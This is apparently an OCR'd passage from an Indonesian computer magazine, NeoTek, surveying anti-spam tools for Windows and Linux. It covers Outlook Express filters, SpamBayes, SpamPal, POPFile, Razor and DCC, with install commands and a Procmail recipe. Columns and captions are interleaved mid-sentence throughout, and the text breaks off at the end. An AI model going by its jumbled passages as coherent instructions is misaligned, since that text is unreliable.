Spamcop memiliki metode yang unik dengan menjaga list tetap 5. Checksum Database
fresh. Spamcop memiliki kemampuan sebagai spam-fighting SpamAssassin menggunakan kolaborasi checksum databse
untuk account POP, IMAP, dan Web-mail. Untuk dapat me- dan Distributed Checksum Clearinghouse (DCC)
manfaatkan pelayanan yang dimiliki oleh spamcop dikenakan melakukan listing pada database untuk mendaftakar
biaya sebesar $30 per tahun untuk setiap account email. sebuah email yang terindikasi sebagai spam.

Vol. IV No. 09 NeoTek 19


NeoStart

Spam Filter pada Outlook Express


Microsoft Outlook
Express (OE) didistri-
busikan gratis sebagai
bagian dari Internet
Explorer (IE). OE di-
rancang sebagai In-
ternet mail dan news
client untuk home
user. OE mendukung
Post Office Protocol
(POP), Internet Mess-
D
IPERLUKAN ACUAN UNTUK DAPAT MEMILIH ANTI-SPAM
age Access Protocol tool yang baik, berikut adalah beberapa paramater
(IMAP), dan Hyper- acuan tersebut:
text Transfer Protocol
(HTTP). 1. Qualification: Memiliki kinerja yang cepat, akurat, dan
dinamis.
Gambar 6. Opsi Block sender pada Outlook Express
2. Quantification: Tidak membuat computer menjadi slow
Blocking Sender down ketika menangani spam.
OE memiliki metode konvensional untuk blacklisting sender 3. Quarantining: Karantina method harus dipandang
dari orang lain yang tidak diinginkan menerima emailnya.. sebagai sutau hal yang serius sebagai salah satu bentuk
Metode ini disebut Blocking Sender, jika alamat pengirim solusi dalam menangani spam.
diblok maka email tersebut secara otomatis akan dihapus, Anti-spam tool dapat bekerja di sisi client atau pada server.
dan itu hanya berfungsi untuk POP. Akan kita bahas contoh-contoh software yang bekerja pada
Cara melakukan Blocking Sender adalah sebagai berikut: kedua sisi itu. Selanjutnya silakan anda bereksperimen
1. Buka pesan yang akan diblacklist sendiri dengan berbagai software anti-spam yang disedia-
2. Klik kanan nama pengirim kan dalam CD NeoTek kali ini.
3. Pada pop-up menu, pilih Block Sender Client-side Mail Filtering
Message Rules Kita akan membahas beberapa program yang powerful un-
Anda juga dapat melakukan setup pada Message Rules tuk mencegah email-email yang tidak kita inginkan (spam)
(Tools>Message Rules) untuk memfilter email yang sebelum mereka masuk ke dalam kotak surat (inbox).
datang, sama seperti Blocking Sender teknik ini hanya Bagi anda yang merupakan pengguna layanan POP3 (Post
berlaku untuk POP email. Dengan teknik ini anda dapat Office Protocol Version 3) pemfilteran email kebanyakan
menentukan aturan kondisi dalam memblokir email yang sudah dilakukan oleh server ISP, tapi bagaimana jika ISP
datang yang mengindikasikan sebagai spam. anda tidak melakukan hal tersebut ? Segala macam bentuk
email beserta jeroannya (bisa saja virus, worm, bahkan tro-
jan yang di-attached-kan) akan masuk begitu saja dengan
mudah ke dalam email clients anda.
Sebagai garis pertahanan terakhir (selain melakukan delete),
client-side mail filter menggunakan beragam metode standar
maupun metode lanjutan untuk pendeteksian (detecting),
pencocokan (matching), pem-filteran (filtering), dan
tweaking terhadap spam.
Bahasan kali ini mencakup solusi untuk pengguna sistem
operasi Microsoft Windows (Windows 2000 atau XP).
Sedangkan program/tools yang akan dibahas dibagi ke
dalam jenis-jenis yang menggunakan dua metode, yaitu
metode pendeteksian (POP Proxy, Outlook plug-in, dll)
dan metode pem-filteran (blacklist, Bayesian/fuzzy filters,
dan kombinasinya). Sejauh ini, pem-filteran Bayesian
selama beberapa tahun terakhir ini dikenal sebagai lebih
efektif dan efisien.
1. SpamBayes
Gambar 7. Message Rules pada Outlook Express SpamBayes merupakan anti-spam tool yang bersifat open-
Anti Spam Tools source. Pada awal pengembangannya, SpamBayes lebih
ditujukan untuk platform UNIX, namun sekarang telah
Selain cara-cara diatas menggunakan tool yang berupa pro- dipakai sebagai plug-in Microsoft Outlook 2000 maupun
gram (software) yang memiliki fungsi anti-spam mungkin Outlook XP. Plug-in tersebut menggunakan analisa statis-
merupakan pilihan yang baik. Tetapi perlu seleksi karena tik Bayesian dalam mensortir email yang masuk sebagai
kini banyak beredar program anti-spam yang belum jelas spam, ham (good e-mail), atau email yang tidak dikenal
sejauh mana kemampuannya dalam menangani spam. sekalipun. Penyortiran dilakukan berdasarkan konfigurasi
Berbagai anti-spam tool dibahas dalam artikel selanjutnya. dan setup folder yang telah anda lakukan.

20 NeoTek Vol. IV No. 09


NeoStart

BAHAYA EMAIL
Anti-Spam Toolkits for Windows
Dengan menggunakan konsep penanggulangan spam, terdapat berbagai software untuk menanggulangi
spam, baik yang berjalan pada sisi client maupun pada sisi server. Mangihut Simanjuntak
(bluefeel_s@yahoo.com) membahas berbagai tool pada sistem operasi Windows.

spam, maka email itu akan masuk ke dalam folder spam/


karantina.
Namun bila email yang masuk telah mendapat ijin dari
pengguna maka email akan langsung masuk ke dalam
kotak surat (inbox).
Jika SpamBayes tidak dapat menentukan status dari email
yang datang, maka email tidak dikenal itu akan masuk ke
dalam folder tidak dikenal.
Jika ada pesan baru yang masih belum dikenali SpamBayes
maka pengguna dapat melakukan pelatihan dan merancang
kembali untuk mengalokasikannya pada email yang diijin-
kan atau spam.
SpamBayes dapat di download di
http://spambayes.sourceforge.net atau dapatkan dalam CD
NeoTek kali ini.
Preinstall Checklist
Gambar 1. SpamBayes akan
terinstalasi sebagai plug-in Sebelum anda menginstall plug-in SpamBayes, perhatikan
Microsoft Outlook
tahapan-tahapan berikut ini agar SpamBayes berfungsi
seperti yang kita inginkan:
1. Buatlah folder incoming spam, unknown email, dan
Cara Kerja Spambayes training folder.
Seperti telah diuraikan sedikit sebelumnya, SpamBayes 2. Ijinkan seberapa banyak spam dan email yang anda
merupakan plug-in Outlook yang cukup powerful karena inginkan (legitimate) ke dalam kotak surat anda
dalam kerjanya SpamBayes menganalisa e-mail header, (inbox). Untuk tujuan kasus kita coba untuk masing-
termasuk From dan To alamat mana email ditujukan, masing sebanyak 500.
Subyek, dan bahkan teks yang terdapat dalam e-mail itu 3. Sortir semua spam ke dalam training folder dan biarkan
sendiri, membentuk definisi model secara statistik bagi email yang anda inginkan (legitimate) masuk ke dalam
penggunanya. inbox.
Selanjutnya, pengguna menampilkan contoh daftar e-mail
yang diijinkan, lalu SpamBayes melakukan pengulangan 2. SpamPal
proses, untuk kemudian membangun model seperti apa SpamPal adalah sebuah program proxy anti-spam yang
yang pengguna harapkan di dalam kotak suratnya.
Pengguna melakukan set up pemfilteran untuk memisah-
kan spam dan e-mail yang tidak dikenal ke dalam respektif
folder, dan SpamBayes siap di jalankan. Ketika email masuk
menuju Outlook
client anda,
SpamBayes
mengukur email
yang masuk ter-
hadap model sta-
tistical. Jika email
tersebut adalah

Gambar 2.
Konfigurasi Gambar 3. SpamPal untuk Windows
SpamBayes

Vol. IV No. 09 NeoTek 21


NeoStart

me-rely ke informasi DNS blacklist/banlist untuk kemu- Cara Kerja Spamcatcher


dian menyortir e-mail yang dicurigai sebagai spam. SpamCatcher secara umum diinstal sebagai proxy pada e-
SpamPal tersedia untuk Windows 9x/2000/XP dan sangat mail client. Pengguna dapat menggunakan konfigurasi de-
kompatibel dengan berbagai macam standar Post Office fault network SpamCatcher atau mengkustomisasi proxy
Protocol 3 (POP3) e-mail client, seperti Eudora, Outlook, dengan daftar e-mail approve/block. E-mail accounts
Outlook Express, dan Pegasus Mail. secara otomatis ter-update ke dalam daftar Approved
Cara Kerja Spampal Senders.
SpamPal memonitor pesan-pesan POP3 yang dilewatkan SpamCatcher memindai/scan setiap e-mail, menandainya
ke e-mail client pengguna, bertindak seperti proxy antara dengan fingerprint ID (menggunakan algoritma Hash),
mail server dan mail client. kemudian membandingkannya dengan ID yang ada pada
network/jaringan SpamCatcher. Jika hash itu cocok,
SpamPal melakukan perbandingan dimulai dari header field SpamCatcher menandai e-mail dan memindahkannya ke
hingga DNS blacklist (DNSBLs). Ketika pesan melewati folder SpamCatcher yang berada di dalam e-mail client.
host pada daftar blacklist menuju kotak surat anda, maka
SpamPal akan menandai pesan tersebut sebagai spam. SpamCatcher juga dapat mengupate networknya yang telah
diidentifikasi pengguna sebagai approved/blocked e-mail.
Pengguna mengkonfigurasi e-mail clientnya untuk memilah Setingan default SpamCatcher menggunakan Esoteric
pesan mana yang merupakan spam ke dalam folder yang Lenient, tetapi pengguna dapat men-set semua value men-
telah ditentukan. Peng-update-an blacklist harus diimbangi jadi value Exclusive, dengan artinya hanya e-mail dari user
dengan peng-update-an whitelist, agar e-mail spam dan atau domain yang ada pada daftar Approved yang dapat
yang legitimate dapat masuk ke dalam foldernya masing- melewati filter.
masing.
Whitelist 4. Lyris MailShield Desktop
Whitelist pada intinya adalah e-mail dari individu ataupun Lyris MailShield
jaringan yang di kenal ‘baik’, yang artinya bahwa e-mail Desktop merupakan
tersebut telah anda sortir dan masuk ke dalam kategori aplikasi proxy e-mail
acceptable/dapat diterima. SpamPal menyediakan tiga yang menggunakan
macam pilihan konfigurasi whitelist: E-mail Addresses aturan filter yang
(pengalamatan e-mail), Automatic (Otomatis), dan dinamai fuzzy logic,
Exclusion (pengecualian). dan juga daftar e-mail
sebagai alat untuk
Blacklist memfilter spam yang
Blacklist merupakan jantung dari fungsi SpamPal. Meng- datang.
gunakan kombinasi dari publik dan spesifik pengguna e-
mail dan daftar networks, SpamPal memblok e-mail yang Gambar 5. Lyris
datang dari spammer yang telah dikenali. Publik Blacklist MailShield Desktop
(DNSBLs), dapat dikonfigurasi dan dimodifikasi berdasar-
kan e-mail address dan daftar hitam/blacklist alamat IP Selain mendukung protokol POP, IMAP, dan MAPI seperti
(internet protocol) yang anda kehendaki. msn.com dan interface HTML pada Hotmail, software ini
SpamPal dapat di download di www.spampal.org juga mengintegrasikan spam reporting dengan beragam pilih-
an konfigurasi.
3. SpamCatcher MailShield Desktop dapat berjalan pada operating system
MailShell SpamCatcher adalah plug-in pem-filteran untuk Windows 98, ME, 200, dan XP juga mendukung POP3,
Microsoft Outlook 2000 / 2002 / XP yang juga dapat digu- IMAP, atau MAPI e-mail client.
nakan pada POP3 clients lain, seperti Eudora, NetScape Cara Kerja Lyris Mailshield Desktop
Messenger, dan sejenisnya.
MailShield menggunakan sebuah kombinasi dan taktik
SpamCatcher mengidentifikasi, tagging, dan memfilter spam dalam mendetek, score, dan memfilter e-mail legitimate
yang datang. Sebagai tambahan/plug-in dan e-mail spam.
Mula-mula MailShield menggunakan aturan-aturan
token-based yang kompleks yang memindai setiap kata
dalam sebuah e-mail.
Yang dimaksud dengan kata di sini adalah kata-kata yang
menampilkan/mewakili dari isi surat itu sendiri, daftar kata
(word lists) dapat dikonfigurasi oleh pengguna. Sebagai
tambahan, MailShield juga menggunakan whitelist dan
Gambar 4. blacklist, pengirim/domain verifikasi.
SpamCatcher Lyris Mailshield Desktop dapat didownload di:
sebagai plug-in www.mailshield.com/products/mailshield/desktop/index.html
pada Outlook.
5. SPAMFighter
pada beberapa versi POP client, layanan SpamCatcher juga SPAMfighter merupakan distribusi anti-spam solutions
tersedia untuk e-mail berbasis web, seperti Yahoo!, Hotmail, yang me-rely pengguna individu dari software client
maupun AOL. untuk meng-update central server dengan pesan spam

22 NeoTek Vol. IV No. 09


NeoStart

mendownload pesan e-mail, melakukan pencocokan dengan


metode whitelist dan blacklist, dan meng-eksekusi pem-
filteran anti-spam terhadap messages headers, subyek, dan
body e-mail.
Pesan yang dikenali sebagai spam akan didelete, tetapi e-mail
yang legitimate akan diteruskannya ke POP client. Alamat
e-mail yang diinginkan pengguna dapat di tambahkan ke
dalam daftar putih (whitelist) supaya SpamButcher dapat
langsung melewatkannya ke POP client atau juga dapat
menambahkan alamat e-mail ke dalam daftar hitam
Gambar 6. (blacklist) agar dapat dilakukan pengenalan terhadap spam
SPAMFightrer pada secara otomatis.
Outlook
Sebagai tambahan, SpamButcher mengeluarkan laporan
yang telah dikenali. SPAMfighter tersedia untuk spam secara reguler. Pengguna dapat melakukan perbaikan/
Windows 98/ME/ 2000/XP dan berfungsi sebagai plug-in restore pesan false-negative; bagaimanapun juga, pesan-
pada Microsoft Outlook 2000/2002/2003 juga untuk pesan itu akan dikirim kembali ke pengguna POP3 server
plug-in Outlook Express. dengan field Dari dan Ke yang berbeda.
Cara Kerja Spamfighter SpamButcher dapat didownload di www.spambutcher.com
Setelah terinstal, SPAMfighter akanmembandingkan e-mail 7. iHateSpam
yang masuk untuk mengetahui pesan spam dengan meng-
komunikasikannya ke sentral SPAMfighter server. Apabila iHateSpam yang dikeluarkan perusahaan Sunbelt Software
/e-mail yang ditemukan sebagai pesan spam, maka secara menggunakan heuristic processing, rules-based engine, dan
otomatis spam akan di kirim ke folder SPAMfighter yang mempunyai daftar block/unblock untuk peng-identifikasian
ada dalam Outlook. pesan spam yang masuk. Berjalan sebagai plug-in pada
Outlook juga Outlook Express, iHateSpam memproses e-mail
Spam yang diatur untuk melewati sistem pemfilteran dan mengkarantina spam diluar lingkungan mail client.
SPAMfighter akan ditandai sebagai spam. Penandaan spam
akan secara otomatis meng-update sentral SPAMfighter iHateSpam tersedia untuk pengguna Windows 9x/Me/
server, dan jika ada banyak pengguna yang melaporkan 2000/XP dan mendukung semua versi Outlook dan
jenis spam yang sama, spam tersebut akan ditandai ke Outlook Express.
semua pengguna software SPAMfighter yang lain.
SPAMfighter dapat di download di www.spamfighter.com
6. SpamButcher
SpamButcher adalah POP3 proxy anti-spam yang mem-
filter e-mail yang dicurigai dengan menggunakan aturan

Gambar 8. iHateSpam pada Outlook Express

Gambar 7. iHateSpam juga didistribusikan sebagai Postal Inspector


SpamButcher oleh perusahaan-perusahaan besar, keduanya mempunyai
konfigurasi dan program pengoperasian yang sama. Postal
filter fuzzy logic yang tidak dapat dikonfigurasi. Inspector tersedia sebagai plug-in AOL versi 6.0 dan 7.0
Tersedia untuk Windows 95 ke atas, SpamButcher dapat Cara Kerja Ihatespam
berjalan dengan bermacam aplikasi POP3 client, termasuk Mesin pendeteksi iHateSpam menggunakan daftar pustaka
Outlook, Outlook Express, Eudora, Pegasus, dan sejenisnya. spam dan bukan spam yang diperolehnya dari pusat server
Cara Kerja Spambutcher Sunbelt Software dan juga dari e-mail yang masuk.
SpamButcher berfungsi sebagai proxy untuk POP3 client, Dengan menggunakan kemungkinan heuristic processing

Vol. IV No. 09 NeoTek 23


NeoStart

yang berdasar kepada user-defined rules-based filtering, dan Gambar 10.


blacklist, iHateSpam merancang yang mana sebagai spam KnockKnock
atau tidak, menangkap spam dalam konsol management setting
offline dan meneruskan ham ke dalam inbox pengguna.
Sebagai tambahan, pengguna dapat melakukan umpan
balik/feedback ke komunitas iHateSpam dan ISP (Internet
Service Provider) spammer dengan melaporkan spammer
tersebut, atau mungkin juga dengan mengirimkan pesan
palsu untuk menakuti spammer itu sendiri.
Sayangnya
iHateSpam tidak
disebarkan secara
gratis, anda dapat
membelinya di
www.sunbelt-

KnockKnock merupakan POP3 e-mail filter yang mengatur


sedemikian rupa spam dengan menggunakan daftar terima
(approved) dan tolak (denied). Program menyertakan kata
sandi dan suatu manajemen sistem untuk mencegah e-mail
yang tidak dikenal masuk ke dalam inbox. KnockKnock
dapat berjalan pada sistem operasi Windows 9x/2000/XP
dan pada kebanyakan POP3 client, termasuk Netscape,
Outlook Express, dan Eudora.
Gambar 9. SpamNet Cara Kerja Knockknock
Pada awal-awal penggunaan KnockKnock, anda dapat mem-
software.com/product.cfm?id=930 buat daftar pengirim yang nantinya akan anda terima atau
tolak. Ketika akan menerima e-mail dari orang yang tidak
8. SpamNet dikenali, KnockKnock menyusun (compile) alamat pengirim
Cloudmark (software developer) menyebut SpamNet seba- dan subyek kemudian mengirimkannya kepada anda untuk
gai Collaborative Spamfighting. Berfungsi sebagai aplikasi ditinjau kembali.Dari sini, anda berhak menerima atau me-
jaringan/ network Peer-to-Peer (P2P), dengan men-delete nolak pesan (juga pengirimnya), mengijinkan KnockKnock
spam dari inbox e-mail clientnya, pengguna sudah melaku- untuk mempelajari apakah arti sebuah spam bagi pengguna
kan kontribusinya untuk komunitas anti-spam, karena KnockKnock.
ketika pendeletan dilakukan, pengguna SpamNet yang lain Sebagai tambahan, KnockKnock juga dapat melewatkan e-
dapat langsung mendeteksi e-mail tersebut sebagai spam. mail yang tidak dikenali (not approved), dengan cara mem-
SpamNet dapat berjalan pada Windows 98/NT/2000/XP berikan kata kunci pada subyek pesan pengirim (yang tidak
dan berfungsi pada Outlook 2000/2002/XP. terdapat dalam daftar approved) yang nantinya kata kunci
Cara Kerja SpamNet inilah sebagai alat untuk melewatkan e-mail tersebut. Kata
kunci tentunya pengguna yang membuatnya.
SpamNet berfungsi sebagai plug-in pada Outlook. Ketika
setiap orang dalam komunitas SpamNet mengenali suatu KnockKnock dapat didownload di www.knockmail.com
e-mail sebagai spam, informasi tersebut akan terkirim ke 10. POPFile
pusat repository Cloudmark.
POPFile merupakan program gratis, juga tools anti-spam
Kemudian laporan itu akan di evaluasi oleh pihak developer. yang open-source yang menggunakan kata kunci dan pem-
Jika memang betul itu adalah spam, maka pesan akan ditam- filteran untuk mengklasifikasikan e-mail dan menyortir-
bahkan ke dalam daftar block SpamNet, dan pesan itu akan nya langsung ke dalam folder anda.
difilter sebagai spam ke semua pengguna SpamNet. Untuk
menghindari kesalahan, setiap pelapor SpamNet diberi pe- POPFile dapat anda latih sesuai dengan kebutuhan, pelatih-
ringkat berdasarkan jumlah laporan ‘baik’ yang telah me- an dimulai dari penyortiran email itu sendiri. Meskipun
reka lakukan. pada dasarnya berfungsi sebagai tools spam-fighting, POPFile
juga dapat melakukan pemilahan e-mail ke dalam folder
Ketika pesan datang ke dalam aplikasi pengguna, SpamNet yang anda inginkan.
menghasilkan one-way hash yang mewakili e-mail ter-
sebut. Aplikasi SpamNet mengirimkan pesan fingerprint ke Oleh sebab itu, jika ada pesan pribadi dan pesan bisnis anda
sentral server dan memberitahukannya ke dalam database, yang masuk ke dalam POP boxyang sama, maka POPFile
melakukan perbandingan fingerprint ke dalam server. Jika akan menyortirnya dengan menggunakan logika yang sama
fingerprint ternyata cocok, pesan akan dikenali sebagai spam seperti yang dilakukannya terhadap spam.
dan dipindahkan dari inbox pengguna ke spam folder. POPFile dapat dioperasikan dengan POP e-mail client dan
SpamNet dapat didownload di www.cloudmark.com tersedia untuk sistem operasi Windows 9x/NT/2000/XP/
2003. POPFile juga tersedia untuk sistem operasi lain yang
9. KnockKnock tersedia lingkungan pemrograman Perl, karena memang
POPFile dibuat dengan bahasa pemrograman Perl.

24 NeoTek Vol. IV No. 09


NeoStart

Cara Kerja POPfile 2. GFI MailEssentials


POPFile beroperasi sebagai POP mail proxy, melakukan pe- MailEssentials adalah anti-spam server yang melakukan
mindaian (scanning) terhadap e-mail yang masuk dengan pemfilteran berdasarkan metode Bayesian. MaiEssentials
menggunakan logika Bayesian dan kemudian memfilter e- mempunyai tambahan tools dalam mengantisipasi spam, di
mail ke dalam folder yang telah anda tentukan sebelum- antaranya global disclaimer signatures, pelaporan (report-
nya. Seperti Bayesian filter kebanyakan, POPFile melaku- ing), mail archiving, dan auto-replies.
kan pembelajaran secara periodik terhadap databasenya
MailEssentials tersedia untuk sistem operasi Windows
berdasarkan peligitimasian e-mail yang sudah anda tentu- 2000/2003 Server dengan Microsoft Exchange 2000/2003.
kan terlebih dahulu. POPFile juga menggunakan fungsi
whitelist dan blacklist dalam pemilahan e-mail. Cara Kerja Mailessentials
POPFile dapat didownload http://POPfile.sourceforge.net MailEssentials melakukan pengontrolan spam pada gate-
way dengan mengaplikasikan aturan Bayesian, blacklist,
Server-side Mail Filtering whitelist, dan fungsi lainnya terhadap semua e-mail yang
Pada bahasan sebelumnya kita telah mengenal tools-tools masuk.
anti-spam client untuk personal user dan seberapa penting Seperti kebanyakan tools Bayesian lain, MailEssentials mem-
peranan mereka bagi penggunanya. pelajari e-mail mana yang merupakan spam atau tidak
Lalu bagaimana dengan perusahaan/organisasi dalam berdasarkan spesifikasi e-mail yang dibuat seorang admin.
menghadapinya? MailEssentials memfilter/memindai dengan mencocokkan-
Jawabannya adalah dengan menggunakan anti-spam server. nya (matching) kepada whitelisted/blacklisted yang telah
Pada intinya anti-spam server menggunakan logika yang ditentukan, dan memverifikasi header information, seperti
beroperasi di dalam mail gateway, jadi tool anti-spam server domains, forged headers, mutations, dan sejenisnya.
memang bertugas di dalam sebuah server. Semua hal yang Setelah melakukan pemindaian, maka dapat dikenali e-mail
menyangkut penginstalasian tool-tool ini mengharuskan mana yang mencurigakan sebagai spam. E-mail yang dike-
anda menggunakan akses admin terlebih dahulu. nal sebagai spam dapat di-delete, di-forward ke alamat
yang lain, atau disimpan dalam publik atau personal folder
1. iHateSpam Server Edition yang sudah disesuaikan sang admin.
iHateSpam Server Edition merupakan spam fighter multi- Segala aktivitas yang sudah dilakukan MailEssentials dapat
strategi yang menggunakan pem-filteran berdasarkan dilihat pada menu reporting function.
semantic dan aturan-aturan tertentu, dan juga mengguna-
kan whitelist dan blacklist untuk menolak masuknya spam MailEssentials dapat didownload di www.gfi.com/mes/
ke dalam mail gateway. iHateSpam Server Edition dikem- 3. Trend Micro Spam Prevention Service
bangkan oleh Sunbelt Software.
Spam Prevention Service (SPS) merupakan tool spam-
iHateSpam dapat berjalan pada Windows 2000 Server dengan
fighting yang kaya akan fitur. SPS dikembangkan oleh
menggunakan Service Pack 3 atau SP yang terbaru dan MS perusahaan TrendMicro.
Exchange 2000 juga dengan Service Pack 3.
Meskipun pada intinya mempunyai kesamaan fungsi dengan
iHateSpam Server Edition adalah program yang didistri- tool-tool lain, namun strategi yang dikembangkan cukup
busikan secara komersial, jadi anda harus mengeluarkan
berbeda. Berbeda dikarenakan SPS melakukan perlawanan
uang untuk dapat merasakan manfaat tool ini. terhadap spam pada SMTP server, yang artinya SPS mem-
Cara Kerja IHateSpam Server Edition filter sebelum e-mail menyentuh mail server. SPS dapat
iHateSpam mengontrol spam di dalam gateway dengan berjalan pada sistem operasi Windows 2000.
mengaplikasikan filter berdasar kata kunci, blacklist, dan Cara Kerja SPS
whitelist baik secara global (berlaku ke seluruh e-mail) Ditempatkan di
atau dengan menggunakan policies (berlaku untuk e-mail
antara mail
tertentu yang dinginkan saja). server dan
Sunbelt Software selalu melakukan update secara teratur Internet, SPS
sebagai pertahanan untuk mengantisipasi spam. E-mail melakukan
yang melanggar aturan pemfilteran akan dicurigai sebagai penilaian
spam, dan jika melewati batas threshold yang telah diten- terhadap e-mail
tukan administrator yang masuk
maka e-mail akan berdasarkan
didelete atau di persamaan dan
arahkan ke folder aturan
karantina. pengkategorian
Sebagai tambahan, spam. Jika score
iHateSpam memiliki mencapai
mesin reporting threshold yang
yang sangat
powerful yang akan
memberitahukan Gambar 12.
secara reguler setiap TrendMicro
spam baru. Spam
telah ditentukan sebagai spam maka pesan Prevention
Gambar 11. GFI MailEssentials. akan tertahan di dalam SPS server. Service (SPS)

Vol. IV No. 09 NeoTek 25


NeoStart

BAHAYA EMAIL
Anti-Spam Toolkits for Linux
Menggunakan konsep penanggulangan spam seperti dibahas sebelumnya, terdapat berbagai software
untuk menanggulangi spam, baik yang berjalan pada sisi client ataupun pada sisi server.
MA Rody Candera (odyxb@bogor.net) mengulas berbagai toolkit anti spam pada sistem operasi Linux.

S
ELAIN DI WINDOWS, ADA JUGA TOOLKITS ANTI SPAM 1. razor-agent.conf; file konfigurasi untuk varia razor-
yang berjalan di lingkungan Linux. Teknik dalam agents yang termasuk didalamnya razor-admin, razor-
menanggulangi spam tidak berbeda jauh dengan check, razor-report, dan razor-revoke.
Windows, yang menjadi perbedaan adalah lingkungan 2. razor-whitelist; sebuah file yang berisi sebuah list atau
tempat program berjalan karena program yang berjalan di daftar alamat-alamat email, domain-domain, dan Body
lingkungan Windows tidak dapat dijalankan di lingkung- Content yang akan ditandai sebagai WhiteList (daftar
an Linux. putih). Email-email tang terdaftar dalam file ini tidak
Oleh karena itu untuk melengkapi pembahasan mengenai dilaporkan dan akan secara otomatis diklasifikasikan
Anti-Spam Toolkits maka disini akan dipaparkan juga sebagai non-spam oleh razor-check.
program-program yang berjalan di lingkungan Linux
yang dapat digunakan untuk menanggulangi spam. Download Razor
Hampir seluruh Anti-Spam Toolkits untuk Linux mem- Razor dapat ddownload dari http://razor.sourceforge.net
butuhkan Procmail. Procmail merupakan mail processor dan didistribusikan dalam dua file, yaitu:
yang jalan sebelum sebuah email dari sebuah mail-server 1. razor-agents-2.xx.tar.gz berisi source code untuk
mengirimkannya kepada seorang pengguna mailbox. razor-agents. xx menandakan nomor versi.
Umumnya, Linux sudah terdistribusi dengan Procmail contoh: razor-agents-2.36.tar.gz
termasuk didalamnya. Jika Linux anda belum memiliki 2. razor-agents-sdk-2.xx.tar.gz berisi sebuah nomor
Procmail, cek ke http://www.procmail.org modul-modul PERL yang dibutuhkan Razor.
Razor memerlukan Perl 5 agar dapat jalankan termasuk
VIPUL’S RAZOR modul-modul Perl seperti:
Vipul’s Razor (selanjutnya akan disebut Razor) berdiri di 1. Net::Ping
server, merupakan gabungan antara software dan sebuah
kolaborasi yang didistribusikan dalam anti-spam network. 2. Net::DNS
Razor didistribusikan gratis, bersifat open source, dan 3. Time::HiRes
didistribusikan dibawah Artistic License. 4. Digest::SHA1
Sistem kerja Razor tidak jauh berbeda dengan SpamNet 5. Getopt::Long
(lihat: Anti-Spam Toolkits for Windows) karena Razor 6. File::Copy
dibuat oleh Vipul Ved Prakesh yang merupakan asisten 7. Digest::Nilsimsa
penemu Cloudmark. 8. URI::Escape
Dengan bermodalkan kekuatan open source menjadikan Instalasi Razor
banyak orang dapat memberikan kontribusi dalam
pengembangan Anti-Spam Toolkit ini, termasuk Berikut langlah-lamgkah dalam menginstalasi Razor:
didalamnya Chad Norwood dan Theo Van Dinter 1. Download dan un-tar razor-agents-sdk-2.xx.tar.gz
(pengembang SpamAssassin). tar -xvf razor-agents-sdk-2.xx.tar.gz
Informasi lebih lanjut mengenai Razor dapat ditemukan
di http://razor.sourceforge.net 2. Ikuti perintah di bawah untuk instalasi modul-modul Perl
Razor dibuat dalam beberapa komponen yang dikenal se- perl Makefile.PL
bagai razor-agents (lihat textbox di bawah). make
Pada pendistribusiannya, Razor dibuat sebagai pasangan make test
file konfigurasi, yaitu:
make install
Razor Agents
3. Download dan un-tar razor-agents-2.xx.tar.gz
razor-admin Yang mendaftarkan anda ke Razor Network
razor-check Agen Filter: yang melakukan pengecekan mail tar -xvf razor-agents-2.xx.tar.gz
dalam network
razor-report Agen Report: yang mengizinkan anda 4. Ikuti perintah di bawah untuk intalasi Razor agents
melaporkan sebuah email sebagai spam ke
perl Makefile.PL
Razor Neotwork
razor-revoke bagian dari Agen Report: kebalikan dari razor- make
report dimana mengizinkan anda melaporkan
make test
sebuah email bukan sebagai spam ke Razor
Network make install

26 NeoTek Vol. IV No. 09


NeoStart

Memfungsikan Razor Download DCC


Hal pertama yang perlu dilakukan ketika menjalankan DCC didistribusikan dalam tiga source konfigurasi (lihat
razor-client adalah membuat symbolic links yang diper- textbox di bawah)
lukan untuk razor-agents. Caranya:
DCC Distribution
# razor-client
dcc-dccd.tar.Z Paket source lengkap termasuk server
creating symlink razor-client <== /usr/bin/razor-check dan semua client dan interface program.
creating symlink razor-client <== /usr/bin/razor-report dcc-dccproc.tar.Z Termasuk dccproc dan dccifd dimana
creating symlink razor-client <== /usr/bin/razor-revoke digunakan dengan mail client.

creating symlink razor-client <== /usr/bin/razor-admin dcc-dccm.tar.Z Termasuk Send Mail Filter interface
(dccm) dan client program (dccproc dan
dccifd).
Ubah dari root ke seorang user dengan anda sebagai pene-
rima mail, kemudian ikuti perintah berikut di bawah:
$ razor-admin -create
Instalasi DCC
Instalasi DCC lebih mudah ketimbang Razor, caranya:
Hal tersebut membangun sebuah default dari direktori 1. Download dan un-tar dcc-dccproc.tar.gz
konfigurasi sebagai ~/.razor (tanda tilde ~ adalah path
untuk direktori home anda). Dan juga membuat beberapa tar -zxvf dcc-dccproc.tar.gz
file konfigurasi seperti:
Hal tersebut juga akan membuat sebuah direktori yang
1. razor-agent.conf disebut ./dcc-dccproc-x.xx (x menunjukkan major dan
2. server.catalogue.lst minor nomor versi).
3. server.nomination.lst 2. Masuk ke direktori yang terbentuk tersebut kemudian
4. server.folly.cloudmark.com.conf lakukan beberapa perintah di bawah ini
5. servers.dicovery.lst ./configure
make
DCC (DISTRIBUTED CHECKSUM CLEARINGHOUSE) make install
Seperti juga Razor, DCC didistribusikan sebagai anti-spam
networks, gratis, dan opensource. Menjalankan DCC
DCC merupakan proyek Rhyolite Software dan dapat Untuk menjalankan dccproc client, anda harus memasti-
ditemukan di http://www.rhyolite.com/anti-spam/dcc kan Procmail telah terinstalasi, kemudian buat sebuah
Email yang ditandai oleh pengguna sebagai sebuah spam Procmail recipe yang berisi beberapa hal seperti berikut di
akan diterima oleh sebuah checksum yang melaporkan hal bawah ini
tersebut ke DCC network. Mail-server atau client akan :0 f
melakukan pengecekan mendalam ke DCC network dengan
| /usr/local/bin/dccproc -ERw -ccmn,5
menggunakan DCC tool yang kemudian dibandingkan
dengan checksum message di database. :0 e

DCC menggunakan fuzzy checksum untuk memfilter {


message yang menggunakan random personal. EXITCODE=67
Berbeda dengan Razor, DCC ditulis dalam bahasa C dan :0
dapat digunakan dalam sebuah variasi jalan dari yang di-
sebut menggunakan Procmail atau sebuah file .forward $HOME/mail/spam

DCC dibuat untuk sebuah server dan beberapa client yang }


didalamnya termasuk:
BOGOFILTER
1. dccproc; Sebuah DCC client yang digunakan berwama
Procmail, Mail/Message User Agents (MUAs), atau Bogofilter masuk sebagai sebuah klasifikasi dari Bayesian
Message Tranfer Agents (MTAs). Menggunakan yang menggunakan metode statistik dan ditulis dalam
Procmail dan dccproc merupakan jalan tercepat untuk bahasa C oleh Eric S. Raymond. Kata bogo pada Bogofilter
DCC aktif dan berjalan. berasal dari kata bogus yang berarti tidak berguna. Dalam
hal ini spam dianggap sebagai bogus email dan Bogofilter
